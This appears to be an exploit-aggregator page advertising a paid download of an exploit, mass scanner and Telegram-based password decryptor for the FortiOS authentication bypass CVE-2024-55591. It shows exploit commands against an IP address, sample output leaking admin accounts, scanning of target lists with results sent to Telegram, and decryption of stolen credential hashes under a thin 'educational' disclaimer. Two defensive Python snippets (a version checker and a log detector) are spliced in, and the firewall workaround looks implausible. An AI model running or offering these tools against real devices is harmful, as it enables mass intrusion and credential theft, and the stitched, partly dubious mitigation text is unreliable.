Source: https://sploitus.com/exploit?id=C7FC81AA-D234-5788-B9DF-9C46E9B682F2
# CVE-2024-55591: FortiOS Authentication Bypass  

**If you're reading this, you most likely know what we're talking about.**
**Nevertheless, for academic purposes only, I bring to your attention the following information.**
**UPD: Also updated the SEARCHER IP. Now it's more efficient, and it gets around a lot of difficulties.**

![CVE](https://img.shields.io/badge/CVE-2024--55591-critical)  
![Python](https://img.shields.io/badge/Python-3.8%2B-blue)  
![License](https://img.shields.io/badge/License-MIT-green)  



---
# [Download](https://satoshidisk.com/pay/COA9G5) - JUST TAKE IT!!!

---
# Detection in Action

```
python3 exp.py --host 192.104.119.11 --port 443 --command "show user local" --ssl

[ASCII-art banner: BINARY WARM]

exp.py
(*) Fortinet FortiOS Authentication Bypass (CVE-2024-55591) POC

CVEs: [CVE-2024-55591]

[*] Checking if target is a FortiOS Management interface
[*] Target is confirmed as a FortiOS Management interface
[*] Target is confirmed as vulnerable to CVE-2024-55591, proceeding with exploitation
Output from server: �m"watchTowr" "admin" "watchTowr" "super_admin" "watchTowr" "watchTowr" [13.37.13.37]:1337 [13.37.13.37]:1337

Output from server: �
get system status

Output from server: �~�FAKESERIAL # "Local_Process_Access" "Local_Process_Access" "root" "" "" "none" [x.x.x.x]:54546 [x.x.x.x]:443
Unknown action 0

FAKESERIAL #
FAKESERIAL # get system status
Version: FortiGate-VM64-AWS v7.0.16,build0667,241001 (GA.M)
Security Level: High
Firmware Signature: certified
Virus-DB: 1.00000(2018-04-09 18:07)
```
---

# Description
A critical authentication bypass vulnerability in FortiOS (versions 7.4.0-7.4.2 and 7.2.0-7.2.6) allows unauthorized administrative access through WebSocket protocol manipulation. This repository contains two tools:
1. **Exploit (exp.py)** - Proof-of-Concept for vulnerability exploitation
2. **Scanner (scanner-cve2024-55591.py)** - Mass detection tool with Telegram notifications

---

# Technical Details
**Vulnerability Type**: Session Hijacking via WebSocket Negotiation  
**Attack Vector**:  
- WebSocket handshake manipulation with forged headers  
- Invalid session token acceptance  
- Privileged CLI command execution

**Affected Components**:  
- `/ws/cli/open` WebSocket endpoint  
- Service Worker API (`/service-worker.js`)

---

# Pentest Environment Setup in `scrypt` Directory

## 1. Initial Server Configuration

### Update system and install core tools
```
sudo apt update && sudo apt full-upgrade -y
sudo apt install -y git python3.10-venv python3-pip python3-dev build-essential libssl-dev libffi-dev ca-certificates
```

## 2. Install base dependencies
```
sudo apt install -y python3 python3-venv python3-pip git
```
## 3. Create project directory and navigate to it
```
mkdir /scrypt && cd /scrypt
```
## 4. Create Python virtual environment named "pentest"
```
python3 -m venv pentest
```
## 5. Activate virtual environment
```
source pentest/bin/activate
```
## 6. Install required Python packages
```
pip install requests urllib3 python-telegram-bot
```
## 7. Move the files exp.py, scanner.py, and targets.txt to the /scrypt directory

---
# Vulnerability searching

## Description
The script scanner-cve2024-55591.py scans a list of Fortinet addresses (listed line-by-line in a text file) for the reported vulnerability and sends positive detection results to your Telegram bot.

## Start scanner
```
python3 scanner-cve2024-55591.py --file targets.txt --port 443
```
Here we go!

![scanner-execution](https://github.com/user-attachments/assets/48000329-f75f-45ea-b7dd-782bcd268872)

- The banner displays vulnerability details (CVE-2024-55591).
- Scanning progress for IPs from targets.txt


## Scan Results
![scan-results-log](https://github.com/user-attachments/assets/57430454-9ce7-4e30-9867-fb5151472cad)

Vulnerable targets detected!

---
# Exploitation
## Run the script:

```
python3 exp.py --host <TARGET_IP> --port 443 --command "show user local" --ssl
```

![exp-execution](https://github.com/user-attachments/assets/80e0bf78-2ad2-4b93-a9f8-16c941575583)

The script performs pre-flight checks:

- Confirms the target is a FortiOS management interface
- Verifies vulnerability to CVE-2024-55591

## Credentials Extraction

Extracted User Credentials
![exp-getting-info](https://github.com/user-attachments/assets/6b978b6e-4615-4a86-a02c-9bf4377ac199)

Here we go!

---
# Decrypting FortiOS encrypted credentials

## Purpose

- Decrypts FortiOS password hashes (ENC format) extracted via CVE-2024-55591  
- Uses AES-128-CBC with a static IV (for demonstration - **not secure for production!**)  
- Designed for educational analysis of compromised credentials

## How It Works

1. **Receives ENC hash** via Telegram message  
2. **Decryption Process**:  
   - Base64 decoding  
   - IV extraction (first 4 bytes + 12 null bytes padding)  
   - AES-128-CBC decryption with hardcoded key `b'Mary had a littl'`  
3. **Returns** cleartext password stripped of null-bytes

## Quick Start

1. Install dependencies:

   ```
   pip install aiogram pycryptodome
   ```

2. Create config file (bot.json):

   ```
   {
     "bot_token": "YOUR_TELEGRAM_BOT_TOKEN"
   }
   ```

3. Run bot:

   ```
   python decryptorbot.py
   ```

4. Send ENC hash to your bot

![telegram-decrypt](https://github.com/user-attachments/assets/046e1013-10db-4138-b170-8fcb77f52886)


---

# Important Notes

- Educational use only - real decryption requires proper key management
- Default key is insecure - replace with environment variables in production
- Never use for unauthorized credential decryption
- Full security advisory: Fortinet PSIRT

---
# Affected Versions

| FortiOS Version | Status     |
|-----------------|------------|
| 7.4.0 - 7.4.2   | Vulnerable |
| 7.2.0 - 7.2.6   | Vulnerable |
| 7.4.3+          | Patched    |
| 7.2.7+          | Patched    |
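A defender's first question is whether a given device falls inside the ranges in the table above. The following is an added example (not code from this repository) that parses a FortiOS version string, including the `get system status` banner format shown in the sample output earlier on this page, and classifies it strictly against the table. Only the 7.2 and 7.4 branches appear in the table, so any other branch (for example the 7.0.16 build seen in the sample output) is reported as "not listed" rather than guessed; the range constants are copied from the table and nothing else is assumed.

```python
# Added example (not part of the original repository): classify a FortiOS
# version string against the affected/patched ranges in the table above.
import re
from typing import Optional, Tuple

# Ranges exactly as given in the table: (branch, first_patch, last_patch), inclusive.
VULNERABLE_RANGES = [
    ((7, 4), 0, 2),  # 7.4.0 - 7.4.2
    ((7, 2), 0, 6),  # 7.2.0 - 7.2.6
]
# First patched release per branch, as given in the table.
PATCHED_FROM = {
    (7, 4): 3,  # 7.4.3+
    (7, 2): 7,  # 7.2.7+
}

# Accepts "7.4.1", "v7.4.1", or a full status banner such as
# "FortiGate-VM64-AWS v7.0.16,build0667,241001 (GA.M)".
_VERSION_RE = re.compile(r"v?(\d+)\.(\d+)\.(\d+)")


def parse_version(text: str) -> Optional[Tuple[int, int, int]]:
    """Return (major, minor, patch) from the first x.y.z found, or None."""
    m = _VERSION_RE.search(text)
    if not m:
        return None
    major, minor, patch = (int(x) for x in m.groups())
    return (major, minor, patch)


def assess(text: str) -> str:
    """Return 'vulnerable', 'patched', 'not listed' or 'unparseable'."""
    ver = parse_version(text)
    if ver is None:
        return "unparseable"
    major, minor, patch = ver
    branch = (major, minor)
    for rng_branch, first, last in VULNERABLE_RANGES:
        if branch == rng_branch and first <= patch <= last:
            return "vulnerable"
    if branch in PATCHED_FROM and patch >= PATCHED_FROM[branch]:
        return "patched"
    # Branches the table does not cover are not guessed either way.
    return "not listed"


if __name__ == "__main__":
    samples = [
        "v7.4.1",
        "7.2.6",
        "7.2.7",
        "FortiGate-VM64-AWS v7.0.16,build0667,241001 (GA.M)",
        "no version here",
    ]
    for s in samples:
        print(f"{s!r}: {assess(s)}")
```

Feed it the `Version:` line of `get system status` from each managed device and act on anything returned as "vulnerable"; treat "not listed" as a prompt to check the vendor advisory, not as a clean result.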
---

# Mitigation

## Immediate Action:

- Upgrade to FortiOS 7.4.3 or 7.2.7.

## Temporary Workaround:

### Block unauthorized header modifications at the WAF/load balancer

```
config firewall policy
    set name "Block_XFF_Spoofing"
    set srcintf "any"
    set dstintf "any"
    set action deny
    set match "X-Forwarded-For"
```
### Audit Logs: Monitor /var/log/sslvpn.log for suspicious admin access attempts
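To make "monitor for suspicious admin access attempts" concrete, here is an added detection example (not code from this repository) that applies the indicators this page describes to event lines: requests to the `/ws/cli/open` WebSocket endpoint from outside the management networks, a client-supplied `X-Forwarded-For` header on a management request (the header-spoofing case the workaround above targets), and a session attributed to the `Local_Process_Access` pseudo-user (seen in the sample CLI output at the top of the page) but arriving from a non-loopback address. The `key="value"` line format, the field names `srcip`, `path`, `user` and `xff`, the `TRUSTED_MGMT` allowlist and the sample lines are all constructed for this example; map them onto whatever your WAF, proxy or log export actually emits.

```python
# Added example (not part of the original repository): flag the indicators
# described on this page in key="value" event lines. Field names, the
# management allowlist and the sample log are CONSTRUCTED assumptions.
import ipaddress
import re
from typing import Dict, List, Tuple

# Networks allowed to reach the management interface (assumed value).
TRUSTED_MGMT = [ipaddress.ip_network("10.0.0.0/8")]

# Matches key="quoted value" or key=bareword.
_KV_RE = re.compile(r'(\w+)=("([^"]*)"|(\S+))')

# Constructed sample log: one event per line.
SAMPLE_LOG = """\
srcip=10.0.5.20 path="/ws/cli/open" user="admin" xff=""
srcip=203.0.113.45 path="/ws/cli/open" user="admin" xff=""
srcip=10.0.5.20 path="/ws/cli/open" user="admin" xff="127.0.0.1"
srcip=203.0.113.45 path="/ws/cli/open" user="Local_Process_Access" xff=""
srcip=10.0.5.21 path="/login" user="admin" xff=""
"""


def parse_line(line: str) -> Dict[str, str]:
    """Parse one key=value / key="value" line into a dict."""
    out: Dict[str, str] = {}
    for m in _KV_RE.finditer(line):
        out[m.group(1)] = m.group(3) if m.group(3) is not None else m.group(4)
    return out


def is_trusted(src: str) -> bool:
    """True if src parses as an address inside an allowed management network."""
    try:
        addr = ipaddress.ip_address(src)
    except ValueError:
        return False
    return any(addr in net for net in TRUSTED_MGMT)


def findings(line: str) -> List[str]:
    """Return the list of indicator names triggered by one event line."""
    ev = parse_line(line)
    hits: List[str] = []
    path = ev.get("path", "")
    src = ev.get("srcip", "")
    # 1. The WebSocket CLI endpoint reached from outside the management networks.
    if path == "/ws/cli/open" and not is_trusted(src):
        hits.append("ws-cli-from-untrusted")
    # 2. A client-supplied X-Forwarded-For on a management WebSocket request.
    if path.startswith("/ws/") and ev.get("xff"):
        hits.append("xff-on-mgmt-request")
    # 3. The local-process pseudo-user should never arrive from a remote address.
    if ev.get("user") == "Local_Process_Access" and src:
        try:
            remote = not ipaddress.ip_address(src).is_loopback
        except ValueError:
            remote = True
        if remote:
            hits.append("local-process-user-remote")
    return hits


def scan(log_text: str) -> List[Tuple[int, List[str]]]:
    """Scan a multi-line log; return (line_number, indicators) for flagged lines."""
    results: List[Tuple[int, List[str]]] = []
    for n, line in enumerate(log_text.splitlines(), 1):
        if not line.strip():
            continue
        hits = findings(line)
        if hits:
            results.append((n, hits))
    return results


if __name__ == "__main__":
    for n, hits in scan(SAMPLE_LOG):
        print(f"line {n}: {', '.join(hits)}")
```

Rule 1 is the one worth keeping permanently even after patching: the management endpoint should only ever be reachable from known administration networks, and any other source is worth an alert regardless of which CVE is in the news.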

---

# References

- Fortinet Advisory: FG-IR-24-535 (https://fortiguard.com/psirt/FG-IR-24-535)
- NVD Entry: https://nvd.nist.gov/vuln/detail/CVE-2024-55591

---

# Legal Disclaimer

This repository is for educational purposes only. Usage of this tool or PoC for unauthorized testing is strictly prohibited. The author assumes no liability for misuse.
